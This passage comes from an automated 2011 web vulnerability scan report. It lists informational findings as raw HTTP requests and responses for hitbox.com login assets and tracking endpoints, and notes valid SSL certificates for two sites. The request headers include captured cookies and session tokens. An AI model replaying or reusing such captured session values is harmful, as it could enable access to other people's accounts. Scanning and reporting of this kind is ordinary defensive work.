Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; ih="b!!!!9!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; lifb=%y_Qs7i<Qa5p0/:

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:11:27 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:11:27 GMT
Pragma: no-cache
Content-Length: 4511
Age: 2
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

30.3. https://login.hitbox.com/dhtml.js,utility.js,cookie.js,helpers.js,dom_object_extensions.js,dom_selectbox.js,dom_autosuggest.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/dhtml.js,utility.js,cookie.js,helpers.js,dom_object_extensions.js,dom_selectbox.js,dom_autosuggest.js

Request

GET /dhtml.js,utility.js,cookie.js,helpers.js,dom_object_extensions.js,dom_selectbox.js,dom_autosuggest.js HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610

Response

HTTP/1.0 200 OK
Expires: Sat, 05 Feb 2011 11:00:33 GMT
Date: Wed, 02 Feb 2011 11:00:33 GMT
Content-Type: text/html
Connection: Keep-Alive
Cache-Control: private

function xNS(){return(navigator.userAgent.toLowerCase().indexOf('gecko')!=-1);}
function xIE(){return(!(navigator.userAgent.toLowerCase().indexOf('gecko')!=-1)&&(document.all&&document.getElementById
...[SNIP]...

30.4. https://login.hitbox.com/images/001982.banner_viralvideo_v1.hbx923x320.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/images/001982.banner_viralvideo_v1.hbx923x320.jpg

Request

Response

30.5. https://login.hitbox.com/images/bg_button.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/images/bg_button.gif

Request

GET /images/bg_button.gif HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Content-Length: 152
Expires: Sat, 05 Feb 2011 11:00:34 GMT
Date: Wed, 02 Feb 2011 11:00:34 GMT
Content-Type: image/gif
Connection: Keep-Alive

GIF89a.......................................................................................................!.......,...........`DX.......`..L..TP...;

30.6. https://login.hitbox.com/images/bg_footer_dash.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/images/bg_footer_dash.gif

Request

GET /images/bg_footer_dash.gif HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Content-Length: 43
Expires: Sat, 05 Feb 2011 11:00:34 GMT
Date: Wed, 02 Feb 2011 11:00:34 GMT
Content-Type: image/gif
Connection: Keep-Alive

GIF89a.......333...!.......,...........DR.;

30.7. https://login.hitbox.com/images/bg_masthead.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/images/bg_masthead.gif

Request

GET /images/bg_masthead.gif HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Content-Length: 24768
Expires: Sat, 05 Feb 2011 11:00:45 GMT
Date: Wed, 02 Feb 2011 11:00:45 GMT
Content-Type: image/gif
Connection: Keep-Alive

GIF89a..7....-z. p.%t.6...|.3.&x.*v.0z./|.%r.2}.#r.*x..z.$p.-v.2~..j..l.&u."r.'t./x.*x."p."r.$t.5}..p.(v..n.(z..k.*z.,{.'t. o.%v.#p."t.0}..h.!m..n.%r.-z.0~."n....m.#x.2..l.!r.7..l.,x.$p.1|.)x.(y.#
...[SNIP]...

30.8. https://login.hitbox.com/images/footer_graphic.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/images/footer_graphic.gif

Request

GET /images/footer_graphic.gif?v=HBX4.4.22 HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Content-Length: 1640
Expires: Sat, 05 Feb 2011 11:00:43 GMT
Date: Wed, 02 Feb 2011 11:00:43 GMT
Content-Type: image/gif
Connection: Keep-Alive

GIF87a%...................... ....
...
.......................................... .!# "$!&(%'(&()')+(*,)+-*,-+-.,./-/1.02/130342...574..... 796...8979:8...<>;=?<>@=?@>@A?AB@ACA...FHEGIFHIG...JKI...J
...[SNIP]...

30.9. https://login.hitbox.com/images/icon_close_small.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/images/icon_close_small.gif

Request

GET /images/icon_close_small.gif HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Content-Length: 79
Expires: Sat, 05 Feb 2011 11:00:46 GMT
Date: Wed, 02 Feb 2011 11:00:46 GMT
Content-Type: image/gif
Connection: Keep-Alive

GIF89a..........LL<......!.......,.......... \.i.......f.....d..y..a.&..h$.P..;

30.10. https://login.hitbox.com/images/img_customer_service.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/images/img_customer_service.gif

Request

GET /images/img_customer_service.gif HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Content-Length: 3256
Expires: Sat, 05 Feb 2011 11:00:34 GMT
Date: Wed, 02 Feb 2011 11:00:34 GMT
Content-Type: image/gif
Connection: Keep-Alive

GIF89a3.3.........................................................................x.t...hnd.................z......``Q..................SQH.....q...jg]......v^........................................
...[SNIP]...

30.11. https://login.hitbox.com/images/logo_hbx_analytics.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/images/logo_hbx_analytics.gif

Request

GET /images/logo_hbx_analytics.gif?v=HBX4.4.22 HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Content-Length: 3201
Expires: Sat, 05 Feb 2011 11:00:45 GMT
Date: Wed, 02 Feb 2011 11:00:45 GMT
Content-Type: image/gif
Connection: Keep-Alive

GIF89a .7...................]..i..m..l..q..u.................................................................................N.*b..e.1g.5j.<o.Ct.Hx.M|.Q.W..`..c..d..g..f..h..o..n..r..w..z..}.........
...[SNIP]...

30.12. https://login.hitbox.com/js/hbx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/js/hbx.js

Request

GET /js/hbx.js HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Expires: Sat, 05 Feb 2011 11:00:34 GMT
Date: Wed, 02 Feb 2011 11:00:34 GMT
Content-Type: text/html
Connection: Keep-Alive
Cache-Control: private
Content-Length: 15041

function _hbOnPrePV(req){for(var a=0;a<_IL(document.links);a++){if(_lvid.length+_lvpos.length<_lvm)
_LV(document.links[a]);else break;}
_ar+="&lv.id="+_lvid+"&lv.pos="+_lvpos;_lvl=-1;}
var _vjs="HBX0
...[SNIP]...

30.13. https://login.hitbox.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/login

Request

GET /login HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610

Response

HTTP/1.0 200 OK
Content-Length: 3845
Content-Encoding: gzip
Expires: 0
Pragma: no-cache
Content-Type: text/html
P3P: policyref="http://hitbox.com/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Cache-Control: no-cache, private, must-revalidate
Vary: *
Set-Cookie: WSS_SESSION=b5f53a-12dbf667e9b-488a-Q-445957; expires=Wed, 02-Feb-02011 07:00:23 GMT; secure
Connection: Keep-Alive

.............n..q_...."#i...,..D<>0N<3.X..`v!....c...![;;... oA. /.. ../....R...HY>.D...}TU..U...<......!..c.<8..Z.yP'...0r..b.E...E......1.%. "!.X.......$d.............9$...<.^.1..3.>.....L....3....
...[SNIP]...

30.14. https://login.hitbox.com/px.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/px.gif

Request

GET /px.gif HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610; testCookie=set

Response

HTTP/1.0 200 OK
Content-Length: 43
Expires: Sat, 05 Feb 2011 11:00:35 GMT
Date: Wed, 02 Feb 2011 11:00:35 GMT
Content-Type: image/gif
Connection: Keep-Alive

GIF89a.............!.......,...........L..;

30.15. https://login.hitbox.com/ss_style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.hitbox.com
Path:	/ss_style.css

Request

GET /ss_style.css?v=HBX4.2.3 HTTP/1.1
Host: login.hitbox.com
Connection: keep-alive
Referer: https://login.hitbox.com/login
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610

Response

HTTP/1.0 200 OK
Expires: Sat, 05 Feb 2011 11:00:33 GMT
Date: Wed, 02 Feb 2011 11:00:33 GMT
Content-Type: text/css
Connection: Keep-Alive
Cache-Control: private
Content-Length: 20445

body {margin: 0; top: 0; left: 0; font-family: Arial,Verdana,MS Sans Serif,Helvetica; font-size: 11px; background-color: #FFFFFF; text-align: center;}
td {font-size: 11px;}
a {color: #336699; text-dec
...[SNIP]...

30.16. http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://millenniumhotels.tt.omtrdc.net
Path:	/m2/millenniumhotels/mbox/standard

Request

GET /m2/millenniumhotels/mbox/standard?mboxHost=www.millenniumhotels.com&mboxSession=1296573995979-796819&mboxPage=1296573995979-796819&screenHeight=1200&screenWidth=1920&browserWidth=1036&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&pageType=HOMEPAGE&pageName=MILLENNIUM%20HOTEL%20USA&hotelId=11536&mbox=global&mboxId=0&mboxTime=1296552395984&mboxURL=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston&mboxVersion=39 HTTP/1.1
Host: millenniumhotels.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 87
Date: Tue, 01 Feb 2011 15:25:52 GMT
Server: Test & Target

mboxFactories.get('default').get('global',0).setOffer(new mboxOfferDefault()).loaded();

30.17. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omnituremarketing.tt.omtrdc.net
Path:	/m2/omnituremarketing/sc/standard

Request

Response

31. SSL certificate previous
There are 2 instances of this issue:

https://ads.pof.com/
https://www.astaro.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

31.1. https://ads.pof.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	ads.pof.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Thu Oct 08 19:00:00 CDT 2009
Valid to:	Mon Oct 08 18:59:59 CDT 2012

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

31.2. https://www.astaro.com/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.astaro.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Sep 18 10:12:18 CDT 2010
Valid to:	Thu Sep 20 14:03:37 CDT 2012

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:05:31 CST 2011.